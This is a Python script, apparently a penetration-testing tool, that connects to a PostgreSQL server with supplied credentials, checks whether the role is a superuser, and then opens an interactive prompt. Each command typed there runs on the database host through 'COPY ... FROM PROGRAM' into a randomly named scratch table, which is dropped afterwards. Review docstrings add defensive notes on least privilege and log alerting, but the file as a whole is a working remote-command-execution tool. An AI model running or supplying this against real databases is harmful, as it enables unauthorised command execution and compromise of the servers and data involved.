  1. #!/usr/bin/env python3
  2.  
  3. import argparse
  4. import random
  5. import psycopg2 as pg
  6.  
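def rand_str(x):
    """Return a string of ``x`` pseudo-random lowercase ASCII letters.

    Written as a ``def`` instead of a name-bound ``lambda`` (PEP 8 E731) so it
    carries a docstring and shows up by name in tracebacks.  It relies on
    :func:`random.choices`, i.e. the non-cryptographic PRNG; the only use in
    this file is to pick throwaway SQL identifiers, not secrets.

    Args:
        x: number of characters to produce; ``0`` yields ``""``.
    """
    return "".join(random.choices("abcdefghijklmnopqrstuvwxyz", k=x))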
  8.  
class PGShell(object):
    """Interactive helper around one psycopg2 connection to a PostgreSQL database.

    Connection parameters are taken from ``kwargs`` (``host``, ``port``,
    ``user``, ``pass``, ``dbname``; every key is mandatory).  A random table
    and column name are generated once at construction and reused by
    :meth:`rce` and :meth:`clean`.

    NOTE(review): all SQL in this class is built by f-string interpolation, and
    :meth:`rce` relies on ``COPY ... FROM PROGRAM``, which makes the *server*
    run a command on the database host.  The script only attempts this when
    the connecting role is a superuser (see :meth:`init_recon`), so the
    practical mitigation is least privilege: application and service accounts
    must not be superusers.  On the detection side, a server statement log
    (for example ``log_statement``) records the ``CREATE TABLE``/``COPY``
    statements with their randomly named identifiers.
    """

    def __init__(self, **kwargs):
        # KeyError if any of the five keys is missing; get_args() supplies all of them.
        self.host       = kwargs['host']
        self.port       = kwargs['port']
        self.user       = kwargs['user']
        self.password   = kwargs['pass']
        self.dbname     = kwargs['dbname']

        # Throwaway identifiers; generated once so clean() can drop the same table.
        self.tablename  = rand_str(random.randint(8, 15))
        self.columnname = rand_str(random.randint(2, 5))

        self.conn = None

        # NOTE(review): exit() is the site-module helper; raising SystemExit from
        # a constructor terminates the whole process, so callers never get an
        # instance back on a failed connection.  self.su is not set here but in
        # init_recon().
        if not self.connect():
            exit()


    def connect(self) -> bool:
        """Open the psycopg2 connection; return True on success, False on any error.

        The DSN is assembled as a libpq key/value string containing the
        password in clear text.  The bare ``except`` also swallows
        ``KeyboardInterrupt`` and ``SystemExit``.
        """
        print(f"[*] Connecting to {self.host}:{self.port}... (db: {self.dbname}, user: {self.user})")
        try:
            self.conn = pg.connect(f"host={self.host} port={self.port} user={self.user} password={self.password} dbname={self.dbname}")
            print("[!] Connected!")
            print(f"[*] We will use table {self.tablename} and column {self.columnname} to leverage RCE...")
            return True
        except:
            print("[x] Connection error!")
            return False

    def do_query(self, query: str):
        """Execute ``query`` and return the first column of every row, or None.

        A new cursor is created per call and never closed explicitly.
        ``execute`` sits outside the ``try``, so execution errors propagate to
        the caller; only ``fetchall`` is guarded, presumably to turn the
        "no results" error raised for statements without a result set into
        ``None`` (TODO confirm).  Nothing in this class ever calls ``commit``,
        so all statements stay inside the connection's open transaction.
        """
        cur = self.conn.cursor()
        cur.execute(query)
        try:
            return [x[0] for x in cur.fetchall()]
        except:
            return None

    def init_recon(self) -> bool:
        """Look up the current role and record whether it is a superuser in ``self.su``.

        Returns True only when ``pg_user.usesuper`` is true for the connected
        role; otherwise the caller is expected to stop.  The role name is
        interpolated into the second query rather than passed as a parameter.
        """
        user = self.do_query("select current_user")[0]
        print(f"[*] Connected as user {user}")
        self.su = self.do_query(f"select usesuper from pg_catalog.pg_user where usename='{user}'")[0]
        if self.su:
            print(f"[!] Sweet! {user} is superuser!")
            return True
        else:
            print(f"[x] Unable to leverage RCE... {user} is not a superuser")
            return False


    def rce(self, command: str):
        """Run ``command`` on the database host via ``COPY ... FROM PROGRAM`` and return its output lines.

        Sequence: (re)create the scratch table with one TEXT column, have the
        server pipe the program's stdout into it, read the rows back, drop the
        table.  ``command`` is placed verbatim inside a single-quoted SQL
        literal.  Any statement failure propagates from :meth:`do_query`; the
        caller (``main``) handles that by calling :meth:`clean`.

        From a defender's viewpoint the ``COPY ... FROM PROGRAM`` statement
        below is the line to alert on in server statement logs.
        """
        self.do_query(f"drop table if exists {self.tablename}")
        self.do_query(f"create table {self.tablename}({self.columnname} TEXT)")
        self.do_query(f"COPY {self.tablename} from program '{command}'")
        data = self.do_query(f"select {self.columnname} from {self.tablename}")
        self.do_query(f"drop table {self.tablename}")
        return data

    def clean(self) -> None:
        """Roll back the open transaction and drop the scratch table if it still exists.

        The explicit ``rollback`` is needed because a failed statement leaves
        the connection's transaction in an aborted state until it is rolled
        back (psycopg2 behaviour — presumably why this is done first; verify).
        """
        print("\n[*] Cleaning database...")
        self.do_query("rollback")
        self.do_query(f"drop table if exists {self.tablename}")
  70.  
def get_args():
    """Parse the command line and return the options as a plain ``dict``.

    Keys are ``host``, ``port``, ``dbname``, ``user`` and ``pass``.  ``user``
    and ``pass`` are mandatory; the others default to ``"localhost"``,
    ``"5432"`` (kept as a string) and ``"postgres"``.  A password supplied
    with ``-P`` is visible in the process list of the client host, which is
    also what makes this invocation easy to spot in process auditing.
    """
    parser = argparse.ArgumentParser()
    # (short flag, long flag, add_argument keyword options)
    option_table = (
        ("-H", "--host", {"help": "Hostname or IP", "default": "localhost"}),
        ("-p", "--port", {"help": "Port of the service", "default": "5432"}),
        ("-d", "--dbname", {"help": "database to connect", "default": "postgres"}),
        ("-U", "--user", {"help": "Username to connect with", "required": True}),
        ("-P", "--pass", {"help": "Password to use", "required": True}),
    )
    for short_flag, long_flag, extra in option_table:
        parser.add_argument(short_flag, long_flag, **extra)

    parsed = parser.parse_args()
    return vars(parsed)
  80.  
def main():
    """Parse arguments, connect, and run an interactive prompt until Ctrl-C.

    Each line typed at the ``user>>`` prompt is handed to :meth:`PGShell.rce`
    and the returned rows are printed.  Any exception from a single command
    (including ``TypeError`` when ``rce`` returns ``None``) is reported and
    followed by :meth:`PGShell.clean`, which rolls the transaction back so the
    next command can run.  ``KeyboardInterrupt`` cleans up and returns
    ``None``, i.e. exit status 0.
    """
    args = get_args()
    # PGShell.__init__ calls exit() itself if the connection cannot be opened.
    pgshell = PGShell(**(args))
    # Stop right away unless the connected role is a superuser.
    if not pgshell.init_recon():
        return

    try:
        while True:
            user_input = input(f"{pgshell.user}>> ")
            try:
                for line in pgshell.rce(user_input):
                    print(line)
                print("-"*50)
            except Exception as e:
                # Error handling is deliberately best-effort: report, roll back, keep prompting.
                print(f"[x] Error: {e}")
                pgshell.clean()
    except KeyboardInterrupt:
        pgshell.clean()
        return
  100.  
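if __name__ == '__main__':
    # Raise SystemExit directly instead of calling the site-module exit()
    # helper, which is not available under `python -S`; main() returns None,
    # so the process exit status is 0 either way.
    raise SystemExit(main())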